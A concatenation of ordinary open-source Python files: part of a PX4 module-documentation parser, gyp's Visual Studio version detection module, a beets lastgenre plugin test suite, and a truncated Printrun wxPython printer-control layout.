next_start_index, arguments = self._parse_arguments(contents, end_index_match)
extracted_function_calls.append((func_name, arguments))
start_index = end_index + 1
if next_start_index > start_index:
start_index = next_start_index
continue
start_index = end_index + 1
if len(extracted_function_calls) > 0:
# add the module to the dict
module_doc = ModuleDocumentation(extracted_function_calls, scope)
if module_doc.name() == '':
raise Exception('PRINT_MODULE_USAGE_NAME not given for ' + scope)
            if module_doc.category() not in ModuleDocumentation.valid_categories:
raise Exception('Invalid/unknown category ' +
module_doc.category() + ' for ' + scope)
self._do_consistency_check(contents, scope, module_doc)
self._modules[module_doc.name()] = module_doc
return True
def _comment_remover(self, text):
""" remove C++ & C style comments.
Source: https://stackoverflow.com/a/241506 """
def replacer(match):
s = match.group(0)
if s.startswith('/'):
return " " # note: a space and not an empty string
else:
return s
return re.sub(self._comment_remove_pattern, replacer, text)
def _do_consistency_check(self, contents, scope, module_doc):
"""
check the documentation for consistency with the code (arguments to
        getopt() and others). This is only approximate, but should catch cases
where an option was added and not documented.
"""
# search all option chars in getopt() calls, combine them & compare
# against the documented set
getopt_args = re.findall(r"\b(px4_|)getopt\b.*\"([a-zA-Z:]+)\"", contents)
# there could be several getopt calls and it is not simple to find which
# command it belongs to, so combine all into a single string
getopt_args = reduce(lambda a, b: a + b[1], getopt_args, '').replace(':', '')
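        # e.g. an illustrative call getopt(argc, argv, "df:x") contributes the
        # option chars 'dfx' once the ':' value markers are stripped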
# some modules don't use getopt or parse the options in another file,
# so only check if both lists are not empty
if len(getopt_args) > 0 and len(module_doc.options()) > 0:
# sort & remove duplicates
            sorted_getopt_args = ''.join(sorted(set(getopt_args)))
            sorted_module_options = ''.join(sorted(set(module_doc.options())))
if sorted_getopt_args != sorted_module_options:
failed = True
# do one more test: check if strcmp(..."-x"... is used instead
if len(sorted_getopt_args) < len(sorted_module_options):
failed = False
# iterate options that are only in module doc
for c in set(sorted_module_options) - set(sorted_getopt_args):
if len(re.findall(r"\bstrcmp\b.*\"-"+c+r"\"", contents)) == 0:
failed = True
if failed:
print("Warning: documentation inconsistency in %s:" % scope)
print(" Documented options : %s" % sorted_module_options)
print(" Options found in getopt(): %s" % sorted_getopt_args)
self._consistency_checks_failure = True
# now check the commands: search for strcmp(argv[i], "command".
# this will also find the value arguments, so append them too to the
# module doc strings
commands = re.findall(r"\bstrcmp\b.*argv\[.*\"(.+)\"", contents) + \
re.findall(r"\bstrcmp\b.*\"(.+)\".*argv\[", contents) + \
re.findall(r"\bstrcmp\b.*\bverb\b.*\"(.+)\"", contents)
doc_commands = module_doc.all_commands() + \
[x for value in module_doc.all_values() for x in value.split('|')]
for command in commands:
if len(command) == 2 and command[0] == '-':
continue # skip options
if command in ['start', 'stop', 'status']:
continue # handled in the base class
            if command not in doc_commands:
print("Warning: undocumented command '%s' in %s" %(command, scope))
self._consistency_checks_failure = True
# limit the maximum line length in the module doc string
max_line_length = 120
module_doc = module_doc.documentation()
verbatim_mode = False
line_nr = 0
for line in module_doc.split('\n'):
line_nr += 1
if line.strip().startswith('```'):
# ignore preformatted blocks
verbatim_mode = not verbatim_mode
elif not verbatim_mode:
if not 'www.' in line and not 'http' in line:
if len(line) > max_line_length:
print('Line too long (%i > %i) in %s:' % (len(line), max_line_length, scope))
print(' '+line)
self._consistency_checks_failure = True
def _parse_arguments(self, contents, start_index):
"""
parse function arguments into a list and return a tuple with (index, [str(args)])
where the index points to the start of the next line.
example: contents[start_index:] may look like:
'p', nullptr, "<topic_name>");
[...]
"""
args = []
next_position = start_index
current_string = ''
while next_position < len(contents):
# skip whitespace
while next_position < len(contents) and contents[next_position] in [' ', '\t', '\n']:
next_position += 1
if next_position >= len(contents):
continue
if contents[next_position] == '\"':
next_position += 1
string = ''
string_start = next_position
while next_position < len(contents):
if contents[next_position] == '\\': # escaping
if contents[next_position + 1] != '\n': # skip if continued on next line
string += contents[next_position:next_position+2].decode('string_escape')
next_position += 2
elif contents[next_position] == '"':
next_position += 1
break
else:
string += contents[next_position]
next_position += 1
# store the string, as it could continue in the form "a" "b"
current_string += string
elif contents.startswith('//', next_position): # comment
next_position = contents.find('\n', next_position)
elif contents.startswith('/*', next_position): # comment
next_position = contents.find('*/', next_position) + 2
else:
if current_string != '':
args.append('"'+current_string+'"')
current_string = ''
if contents.startswith('R\"', next_position): # C++11 raw string literal
bracket = contents.find('(', next_position)
identifier = contents[next_position+2:bracket]
raw_string_end = contents.find(')'+identifier+'"', next_position)
args.append('"'+contents[next_position+3+len(identifier):raw_string_end]+'"')
next_position = raw_string_end+len(identifier)+2
elif contents[next_position] == ')':
break # finished
elif contents[next_position] == ',':
next_position += 1 # skip
elif contents[next_position] == '(':
raise Exception('parser error: unsupported "(" in function arguments')
else:
# keyword (true, nullptr, ...), number or char (or variable).
# valid separators are: \n, ,, ), //, /*
next_arg_pos = contents.find(',', next_position)
m = re.search(r"\n|,|\)|//|/\*", contents[next_position:])
if m:
next_arg_pos = m.start() + next_position
args.append(contents[next_position:next_arg_pos].strip())
else:
raise Exception('parser error')
next_position = next_arg_pos
#print(args)
# find the next line
next_position = contents.find('\n', next_position)
if next_position >= 0: next_position += 1
return next_position, args
def HasValidationFailure(self):
return self._consistency_checks_failure
def GetModuleGroups(self):
"""
Returns a dictionary of all categories with a list of associated modules.
"""
groups = {}
for module_name in self._modules:
module = self._modules[module_name]
if module.category() in groups:
groups[module.category()].append(module)
else:
groups[module.category()]= [module]
# sort by module name
for category in groups:
group = groups[category]
groups[category] = sorted(group, key=lambda x: x.name())
return groups
|
rafaeltomesouza/frontend-class1
|
refs/heads/master
|
aula2/a11/linkedin/client/.gradle/yarn/node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py
|
1509
|
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Handle version information related to Visual Stuio."""
import errno
import os
import re
import subprocess
import sys
import gyp
import glob
class VisualStudioVersion(object):
"""Information regarding a version of Visual Studio."""
def __init__(self, short_name, description,
solution_version, project_version, flat_sln, uses_vcxproj,
path, sdk_based, default_toolset=None):
self.short_name = short_name
self.description = description
self.solution_version = solution_version
self.project_version = project_version
self.flat_sln = flat_sln
self.uses_vcxproj = uses_vcxproj
self.path = path
self.sdk_based = sdk_based
self.default_toolset = default_toolset
def ShortName(self):
return self.short_name
def Description(self):
"""Get the full description of the version."""
return self.description
def SolutionVersion(self):
"""Get the version number of the sln files."""
return self.solution_version
def ProjectVersion(self):
"""Get the version number of the vcproj or vcxproj files."""
return self.project_version
def FlatSolution(self):
return self.flat_sln
def UsesVcxproj(self):
"""Returns true if this version uses a vcxproj file."""
return self.uses_vcxproj
def ProjectExtension(self):
"""Returns the file extension for the project."""
return self.uses_vcxproj and '.vcxproj' or '.vcproj'
def Path(self):
"""Returns the path to Visual Studio installation."""
return self.path
def ToolPath(self, tool):
"""Returns the path to a given compiler tool. """
return os.path.normpath(os.path.join(self.path, "VC/bin", tool))
def DefaultToolset(self):
"""Returns the msbuild toolset version that will be used in the absence
of a user override."""
return self.default_toolset
def SetupScript(self, target_arch):
"""Returns a command (with arguments) to be used to set up the
environment."""
# Check if we are running in the SDK command line environment and use
# the setup script from the SDK if so. |target_arch| should be either
# 'x86' or 'x64'.
assert target_arch in ('x86', 'x64')
sdk_dir = os.environ.get('WindowsSDKDir')
if self.sdk_based and sdk_dir:
return [os.path.normpath(os.path.join(sdk_dir, 'Bin/SetEnv.Cmd')),
'/' + target_arch]
else:
# We don't use VC/vcvarsall.bat for x86 because vcvarsall calls
# vcvars32, which it can only find if VS??COMNTOOLS is set, which it
# isn't always.
if target_arch == 'x86':
if self.short_name >= '2013' and self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
# VS2013 and later, non-Express have a x64-x86 cross that we want
# to prefer.
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), 'amd64_x86']
# Otherwise, the standard x86 compiler.
return [os.path.normpath(
os.path.join(self.path, 'Common7/Tools/vsvars32.bat'))]
else:
assert target_arch == 'x64'
arg = 'x86_amd64'
# Use the 64-on-64 compiler if we're not using an express
# edition and we're running on a 64bit OS.
if self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
arg = 'amd64'
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), arg]
def _RegistryQueryBase(sysdir, key, value):
"""Use reg.exe to read a particular key.
  Ideally we might use the win32 module, but we would like gyp to stay
  python neutral; cygwin python, for instance, lacks this module.
Arguments:
sysdir: The system subdirectory to attempt to launch reg.exe from.
key: The registry key to read from.
value: The particular value to read.
Return:
stdout from reg.exe, or None for failure.
"""
  # Skip if not on Windows, or if there is a Python Win32 setup issue
if sys.platform not in ('win32', 'cygwin'):
return None
# Setup params to pass to and attempt to launch reg.exe
cmd = [os.path.join(os.environ.get('WINDIR', ''), sysdir, 'reg.exe'),
'query', key]
if value:
cmd.extend(['/v', value])
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Obtain the stdout from reg.exe, reading to the end so p.returncode is valid
# Note that the error text may be in [1] in some cases
text = p.communicate()[0]
# Check return code from reg.exe; officially 0==success and 1==error
if p.returncode:
return None
return text
def _RegistryQuery(key, value=None):
r"""Use reg.exe to read a particular key through _RegistryQueryBase.
First tries to launch from %WinDir%\Sysnative to avoid WoW64 redirection. If
that fails, it falls back to System32. Sysnative is available on Vista and
up and available on Windows Server 2003 and XP through KB patch 942589. Note
that Sysnative will always fail if using 64-bit python due to it being a
virtual directory and System32 will work correctly in the first place.
KB 942589 - http://support.microsoft.com/kb/942589/en-us.
Arguments:
key: The registry key.
value: The particular registry value to read (optional).
Return:
stdout from reg.exe, or None for failure.
"""
text = None
try:
text = _RegistryQueryBase('Sysnative', key, value)
except OSError, e:
if e.errno == errno.ENOENT:
text = _RegistryQueryBase('System32', key, value)
else:
raise
return text
def _RegistryGetValueUsingWinReg(key, value):
"""Use the _winreg module to obtain the value of a registry key.
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure. Throws
ImportError if _winreg is unavailable.
"""
import _winreg
try:
root, subkey = key.split('\\', 1)
assert root == 'HKLM' # Only need HKLM for now.
with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, subkey) as hkey:
return _winreg.QueryValueEx(hkey, value)[0]
except WindowsError:
return None
def _RegistryGetValue(key, value):
"""Use _winreg or reg.exe to obtain the value of a registry key.
Using _winreg is preferable because it solves an issue on some corporate
environments where access to reg.exe is locked down. However, we still need
  to fall back to reg.exe for the case where the _winreg module is not available
(for example in cygwin python).
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure.
"""
try:
return _RegistryGetValueUsingWinReg(key, value)
except ImportError:
pass
  # Fall back to reg.exe if we fail to import _winreg.
text = _RegistryQuery(key, value)
if not text:
return None
# Extract value.
match = re.search(r'REG_\w+\s+([^\r]+)\r\n', text)
if not match:
return None
return match.group(1)
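# Usage sketch (Windows only; key and value are illustrative):
#   path = _RegistryGetValue(r'HKLM\Software\Microsoft\VisualStudio\12.0',
#                            'InstallDir')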
def _CreateVersion(name, path, sdk_based=False):
"""Sets up MSVS project generation.
Setup is based off the GYP_MSVS_VERSION environment variable or whatever is
autodetected if GYP_MSVS_VERSION is not explicitly specified. If a version is
  passed in that doesn't match a value in versions, python will raise an error.
"""
if path:
path = os.path.normpath(path)
versions = {
'2015': VisualStudioVersion('2015',
'Visual Studio 2015',
solution_version='12.00',
project_version='14.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v140'),
'2013': VisualStudioVersion('2013',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2013e': VisualStudioVersion('2013e',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2012': VisualStudioVersion('2012',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2012e': VisualStudioVersion('2012e',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2010': VisualStudioVersion('2010',
'Visual Studio 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2010e': VisualStudioVersion('2010e',
'Visual C++ Express 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2008': VisualStudioVersion('2008',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2008e': VisualStudioVersion('2008e',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005': VisualStudioVersion('2005',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005e': VisualStudioVersion('2005e',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
}
return versions[str(name)]
def _ConvertToCygpath(path):
"""Convert to cygwin path if we are using cygwin."""
if sys.platform == 'cygwin':
p = subprocess.Popen(['cygpath', path], stdout=subprocess.PIPE)
path = p.communicate()[0].strip()
return path
def _DetectVisualStudioVersions(versions_to_check, force_express):
"""Collect the list of installed visual studio versions.
Returns:
A list of visual studio versions installed in descending order of
usage preference.
Base this on the registry and a quick check if devenv.exe exists.
  Only versions 8-14 (2005-2015) are considered.
Possibilities are:
2005(e) - Visual Studio 2005 (8)
2008(e) - Visual Studio 2008 (9)
2010(e) - Visual Studio 2010 (10)
2012(e) - Visual Studio 2012 (11)
2013(e) - Visual Studio 2013 (12)
2015 - Visual Studio 2015 (14)
Where (e) is e for express editions of MSVS and blank otherwise.
"""
version_to_year = {
'8.0': '2005',
'9.0': '2008',
'10.0': '2010',
'11.0': '2012',
'12.0': '2013',
'14.0': '2015',
}
versions = []
for version in versions_to_check:
# Old method of searching for which VS version is installed
# We don't use the 2010-encouraged-way because we also want to get the
# path to the binaries, which it doesn't offer.
keys = [r'HKLM\Software\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Microsoft\VCExpress\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VCExpress\%s' % version]
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], 'InstallDir')
if not path:
continue
path = _ConvertToCygpath(path)
# Check for full.
full_path = os.path.join(path, 'devenv.exe')
express_path = os.path.join(path, '*express.exe')
if not force_express and os.path.exists(full_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version],
os.path.join(path, '..', '..')))
# Check for express.
elif glob.glob(express_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..', '..')))
# The old method above does not work when only SDK is installed.
keys = [r'HKLM\Software\Microsoft\VisualStudio\SxS\VC7',
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\SxS\VC7']
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], version)
if not path:
continue
path = _ConvertToCygpath(path)
if version != '14.0': # There is no Express edition for 2015.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..'), sdk_based=True))
return versions
def SelectVisualStudioVersion(version='auto', allow_fallback=True):
"""Select which version of Visual Studio projects to generate.
Arguments:
version: Hook to allow caller to force a particular version (vs auto).
Returns:
An object representing a visual studio project format version.
"""
# In auto mode, check environment variable for override.
if version == 'auto':
version = os.environ.get('GYP_MSVS_VERSION', 'auto')
version_map = {
'auto': ('14.0', '12.0', '10.0', '9.0', '8.0', '11.0'),
'2005': ('8.0',),
'2005e': ('8.0',),
'2008': ('9.0',),
'2008e': ('9.0',),
'2010': ('10.0',),
'2010e': ('10.0',),
'2012': ('11.0',),
'2012e': ('11.0',),
'2013': ('12.0',),
'2013e': ('12.0',),
'2015': ('14.0',),
}
override_path = os.environ.get('GYP_MSVS_OVERRIDE_PATH')
if override_path:
msvs_version = os.environ.get('GYP_MSVS_VERSION')
if not msvs_version:
raise ValueError('GYP_MSVS_OVERRIDE_PATH requires GYP_MSVS_VERSION to be '
'set to a particular version (e.g. 2010e).')
return _CreateVersion(msvs_version, override_path, sdk_based=True)
version = str(version)
versions = _DetectVisualStudioVersions(version_map[version], 'e' in version)
if not versions:
if not allow_fallback:
raise ValueError('Could not locate Visual Studio installation.')
if version == 'auto':
# Default to 2005 if we couldn't find anything
return _CreateVersion('2005', None)
else:
return _CreateVersion(version, None)
return versions[0]
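# Sketch of typical use (the result depends on what is installed locally):
#   msvs = SelectVisualStudioVersion('2013')
#   print(msvs.Description())  # e.g. 'Visual Studio 2013'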
|
andremiller/beets
|
refs/heads/master
|
test/test_lastgenre.py
|
1
|
# This file is part of beets.
# Copyright 2015, Fabrice Laporte.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'lastgenre' plugin."""
from mock import Mock
import _common
from _common import unittest
from beetsplug import lastgenre
from beets import config
from helper import TestHelper
class LastGenrePluginTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.plugin = lastgenre.LastGenrePlugin()
def tearDown(self):
self.teardown_beets()
def _setup_config(self, whitelist=False, canonical=False, count=1):
config['lastgenre']['canonical'] = canonical
config['lastgenre']['count'] = count
if isinstance(whitelist, (bool, basestring)):
# Filename, default, or disabled.
config['lastgenre']['whitelist'] = whitelist
self.plugin.setup()
if not isinstance(whitelist, (bool, basestring)):
# Explicit list of genres.
self.plugin.whitelist = whitelist
def test_default(self):
"""Fetch genres with whitelist and c14n deactivated
"""
self._setup_config()
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues')
def test_c14n_only(self):
"""Default c14n tree funnels up to most common genre except for *wrong*
genres that stay unchanged.
"""
self._setup_config(canonical=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'Iota Blues')
def test_whitelist_only(self):
"""Default whitelist rejects *wrong* (non existing) genres.
"""
self._setup_config(whitelist=True)
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_whitelist_c14n(self):
"""Default whitelist and c14n both activated result in all parents
genres being selected (from specific to common).
"""
self._setup_config(canonical=True, whitelist=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues, Blues')
def test_whitelist_custom(self):
"""Keep only genres that are in the whitelist.
"""
self._setup_config(whitelist=set(['blues', 'rock', 'jazz']),
count=2)
self.assertEqual(self.plugin._resolve_genres(['pop', 'blues']),
'Blues')
self._setup_config(canonical='', whitelist=set(['rock']))
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_count(self):
"""Keep the n first genres, as we expect them to be sorted from more to
less popular.
"""
self._setup_config(whitelist=set(['blues', 'rock', 'jazz']),
count=2)
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'rock', 'blues']),
'Jazz, Rock')
def test_count_c14n(self):
"""Keep the n first genres, after having applied c14n when necessary
"""
self._setup_config(whitelist=set(['blues', 'rock', 'jazz']),
canonical=True,
count=2)
        # thanks to c14n, 'blues' supersedes 'country blues' and takes the
# second slot
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'country blues', 'rock']),
'Jazz, Blues')
def test_c14n_whitelist(self):
"""Genres first pass through c14n and are then filtered
"""
self._setup_config(canonical=True, whitelist=set(['rock']))
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_empty_string_enables_canonical(self):
"""For backwards compatibility, setting the `canonical` option
to the empty string enables it using the default tree.
"""
self._setup_config(canonical='', count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
def test_empty_string_enables_whitelist(self):
"""Again for backwards compatibility, setting the `whitelist`
option to the empty string enables the default set of genres.
"""
self._setup_config(whitelist='')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_no_duplicate(self):
"""Remove duplicated genres.
"""
self._setup_config(count=99)
self.assertEqual(self.plugin._resolve_genres(['blues', 'blues']),
'Blues')
def test_tags_for(self):
class MockPylastElem(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
class MockPylastObj(object):
def get_top_tags(self):
tag1 = Mock()
tag1.weight = 90
tag1.item = MockPylastElem(u'Pop')
tag2 = Mock()
tag2.weight = 40
tag2.item = MockPylastElem(u'Rap')
return [tag1, tag2]
plugin = lastgenre.LastGenrePlugin()
res = plugin._tags_for(MockPylastObj())
self.assertEqual(res, [u'pop', u'rap'])
res = plugin._tags_for(MockPylastObj(), min_weight=50)
self.assertEqual(res, [u'pop'])
def test_get_genre(self):
MOCK_GENRES = {'track': u'1', 'album': u'2', 'artist': u'3'}
def mock_fetch_track_genre(self, obj=None):
return MOCK_GENRES['track']
def mock_fetch_album_genre(self, obj):
return MOCK_GENRES['album']
def mock_fetch_artist_genre(self, obj):
return MOCK_GENRES['artist']
lastgenre.LastGenrePlugin.fetch_track_genre = mock_fetch_track_genre
lastgenre.LastGenrePlugin.fetch_album_genre = mock_fetch_album_genre
lastgenre.LastGenrePlugin.fetch_artist_genre = mock_fetch_artist_genre
self._setup_config(whitelist=False)
item = _common.item()
item.genre = MOCK_GENRES['track']
config['lastgenre'] = {'force': False}
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'keep'))
config['lastgenre'] = {'force': True, 'source': 'track'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (MOCK_GENRES['track'], 'track'))
config['lastgenre'] = {'source': 'album'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (MOCK_GENRES['album'], 'album'))
config['lastgenre'] = {'source': 'artist'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (MOCK_GENRES['artist'], 'artist'))
MOCK_GENRES['artist'] = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'original'))
config['lastgenre'] = {'fallback': 'rap'}
item.genre = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (config['lastgenre']['fallback'].get(),
'fallback'))
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
dob71/x2swn
|
refs/heads/master
|
printrun/gui/controls.py
|
1
|
# This file is part of the Printrun suite.
#
# Printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import wx
from .xybuttons import XYButtons, XYButtonsMini
from .zbuttons import ZButtons, ZButtonsMini
from .graph import Graph
from .widgets import TempGauge
from wx.lib.agw.floatspin import FloatSpin
from .utils import make_button, make_custom_button
class XYZControlsSizer(wx.GridBagSizer):
def __init__(self, root, parentpanel = None):
super(XYZControlsSizer, self).__init__()
if not parentpanel: parentpanel = root.panel
root.xyb = XYButtons(parentpanel, root.moveXY, root.homeButtonClicked, root.spacebarAction, root.bgcolor, zcallback=root.moveZ)
self.Add(root.xyb, pos = (0, 1), flag = wx.ALIGN_CENTER)
root.zb = ZButtons(parentpanel, root.moveZ, root.bgcolor)
self.Add(root.zb, pos = (0, 2), flag = wx.ALIGN_CENTER)
root.hottgauge = {}
wx.CallAfter(root.xyb.SetFocus)
def add_extra_controls(self, root, parentpanel, extra_buttons = None, mini_mode = False):
standalone_mode = extra_buttons is not None
base_line = (3 if root.display_graph else 2)
e_base_line = base_line + 4
gauges_base_line = e_base_line + 2
gauge_lines = root.settings.extruders if root.display_gauges else 1
tempdisp_line = gauges_base_line + gauge_lines + 1
pos_mapping = {
"tempgraph": (base_line - 1, 0),
"ext_controls": (base_line + 0, 0),
"htemp_label": (base_line + 1, 0),
"htemp_val": (base_line + 1, 1),
"htemp_set": (base_line + 1, 2),
"htemp_off": (base_line + 1, 3),
"btemp_label": (base_line + 2, 0),
"btemp_val": (base_line + 2, 1),
"btemp_set": (base_line + 2, 2),
"btemp_off": (base_line + 2, 3),
"speedcontrol": (base_line + 3, 0),
"esettings": (e_base_line + 0, 0),
"edist_label": (0, 0),
"edist_val": (1, 0),
"edist_unit": (1, 1),
"efeed_label": (0, 2),
"efeed_val": (1, 2),
"efeed_unit": (1, 3),
"ebuttons": (e_base_line + 1, 0),
"extrude": (0, 1),
"reverse": (0, 2),
"chktemp": (0, 3),
"htemp_gauge0": (gauges_base_line, 0),
"btemp_gauge": (gauges_base_line + gauge_lines, 0),
"tempdisp": (tempdisp_line, 0),
}
for i in range(1, root.settings.extruders):
pos_mapping["htemp_gauge" + str(i)] = (gauges_base_line + i, 0)
span_mapping = {
"tempgraph": (1, 6),
"ext_controls": (1, 6),
"htemp_label": (1, 1),
"htemp_off": (1, 1),
"htemp_val": (1, 1),
"htemp_set": (1, 1),
"btemp_label": (1, 1),
"btemp_off": (1, 1),
"btemp_val": (1, 1),
"btemp_set": (1, 1),
"esettings": (1, 5),
"speedcontrol": (1, 5),
"htemp_gauge0": (1, 6),
"htemp_gauge1": (1, 6),
"htemp_gauge2": (1, 6),
"btemp_gauge": (1, 6),
"tempdisp": (1, 6),
"ebuttons": (1, 4),
"extrude": (1, 1),
"reverse": (1, 1),
"chktemp": (1, 1),
}
def add(name, widget, *args, **kwargs):
kwargs["pos"] = pos_mapping[name]
if name in span_mapping:
kwargs["span"] = span_mapping[name]
if "container" in kwargs:
container = kwargs["container"]
del kwargs["container"]
else:
container = self
container.Add(widget, *args, **kwargs)
    # Border between control groups
off_top = 5
# Hotend & bed temperatures #
# Hotend temp
add("htemp_label", wx.StaticText(parentpanel, -1, _("Heat:")), flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT | wx.TOP, border = off_top)
htemp_choices = [root.temps[i] + " (" + i + ")" for i in sorted(root.temps.keys(), key = lambda x:root.temps[x])]
root.settoff = make_button(parentpanel, _("Off"), lambda e: root.do_settemp("off"), _("Switch Hotend Off"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.settoff)
add("htemp_off", root.settoff, flag = wx.TOP, border = off_top)
if root.settings.last_temperature not in map(float, root.temps.values()):
htemp_choices = [str(root.settings.last_temperature)] + htemp_choices
root.htemp = wx.ComboBox(parentpanel, -1, choices = htemp_choices,
style = wx.CB_DROPDOWN, size = (200, -1))
root.htemp.SetToolTip(wx.ToolTip(_("Select Temperature for Hotend")))
root.htemp.Bind(wx.EVT_COMBOBOX, root.htemp_change)
add("htemp_val", root.htemp, flag = wx.TOP, border = off_top)
root.settbtn = make_button(parentpanel, _("Set"), root.do_settemp, _("Switch Hotend On"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.settbtn)
add("htemp_set", root.settbtn, flag = wx.EXPAND | wx.TOP, border = off_top)
# Bed temp
add("btemp_label", wx.StaticText(parentpanel, -1, _("Bed: ")), flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT)
btemp_choices = [root.bedtemps[i] + " (" + i + ")" for i in sorted(root.bedtemps.keys(), key = lambda x:root.bedtemps[x])]
root.setboff = make_button(parentpanel, _("Off"), lambda e: root.do_bedtemp("off"), _("Switch Heated Bed Off"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.setboff)
add("btemp_off", root.setboff)
if root.settings.last_bed_temperature not in map(float, root.bedtemps.values()):
btemp_choices = [str(root.settings.last_bed_temperature)] + btemp_choices
root.btemp = wx.ComboBox(parentpanel, -1, choices = btemp_choices,
style = wx.CB_DROPDOWN, size = (200, -1))
root.btemp.SetToolTip(wx.ToolTip(_("Select Temperature for Heated Bed")))
root.btemp.Bind(wx.EVT_COMBOBOX, root.btemp_change)
add("btemp_val", root.btemp)
root.setbbtn = make_button(parentpanel, _("Set"), root.do_bedtemp, _("Switch Heated Bed On"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.setbbtn)
add("btemp_set", root.setbbtn, flag = wx.EXPAND)
root.btemp.SetValue(str(root.settings.last_bed_temperature))
root.htemp.SetValue(str(root.settings.last_temperature))
    # Added to fix an issue where only the bed choices were tagged (pla) or (abs).
    # This ensures that if the last temperature is a pla/abs default it is marked
    # as such; otherwise a (user) remark is appended to denote a manual entry.
for i in btemp_choices:
if i.split()[0] == str(root.settings.last_bed_temperature).split('.')[0] or i.split()[0] == str(root.settings.last_bed_temperature):
root.btemp.SetValue(i)
for i in htemp_choices:
if i.split()[0] == str(root.settings.last_temperature).split('.')[0] or i.split()[0] == str(root.settings.last_temperature):
root.htemp.SetValue(i)
